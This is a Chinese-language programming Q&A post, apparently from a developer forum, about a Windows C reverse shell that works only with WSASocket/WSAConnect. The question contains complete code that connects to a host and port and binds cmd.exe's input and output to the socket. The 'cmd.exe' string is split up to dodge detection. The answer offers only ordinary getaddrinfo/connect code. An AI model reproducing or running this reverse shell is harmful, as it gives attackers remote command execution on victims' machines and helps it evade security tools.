我正在用C / C ++尝试一些反向shell代码。 IT工作正常,但仅当我使用WSAConnect
和WSASocket
时才可以。如果我使用socket();
或connect();
,它不起作用吗?为什么会这样?
我总是用connect();
代替WSAConnect
,用socket();
代替WSASocket
。我知道我缺少什么。
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
WSADATA wsa;
SOCKET sock;
struct sockaddr_in server;
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
int main(int argc, char *argv[])
{
WSAStartup(MAKEWORD(2,2), &wsa);
// sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); This also doesn't work
sock = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
server.sin_family = AF_INET;
server.sin_port = htons(4942);
server.sin_addr.s_addr =inet_addr("127.0.0.1");
// connect(sock, (struct sockaddr*)&server, sizeof(server)); This doesn't work
WSAConnect(sock,(SOCKADDR*)&server, sizeof(server),NULL,NULL,NULL,NULL);
if (WSAGetLastError() == 0) {
memset(&sinfo, 0, sizeof(sinfo));
sinfo.cb=sizeof(sinfo);
sinfo.dwFlags=STARTF_USESTDHANDLES;
sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)sock;
char *myArray[4] = { "cm", "d.e", "x", "e" };
char command[8] = "";
snprintf( command, sizeof(command), "%s%s%s%s", myArray[0], myArray[1], myArray[2], myArray[3]);
CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
exit(0);
} else {
exit(0);
}
}
您的代码是C语言而不是C ++语言,因此您的标签已关闭。此外,Microsoft在其文档inet_addr
中声明已弃用,而您应该使用也支持ipv6地址的getaddrinfo。这将正确连接。
#include <ws2tcpip.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
WSADATA data = { 0 };
WSAStartup(MAKEWORD(2, 2), &data);
struct addrinfo src = { 0 };
src.ai_protocol = IPPROTO_TCP;
src.ai_socktype = SOCK_STREAM;
struct addrinfo* dst = NULL;
if (getaddrinfo("127.0.0.1", "4942", &src, &dst)) {
WSACleanup();
return -1;
}
SOCKET connection = socket(dst->ai_family, dst->ai_socktype, dst->ai_protocol);
if (connection == -1) {
freeaddrinfo(dst);
WSACleanup();
return -1;
}
if (!connect(connection, dst->ai_addr, dst->ai_addrlen)) {
printf("Connected\n");
}
else {
printf("Failed to connect\n");
}
freeaddrinfo(dst);
closesocket(connection);
WSACleanup();
return 0;
}
您可以比我做得更好一些,例如创建一个单独的函数并传递一个开放式手柄的结构。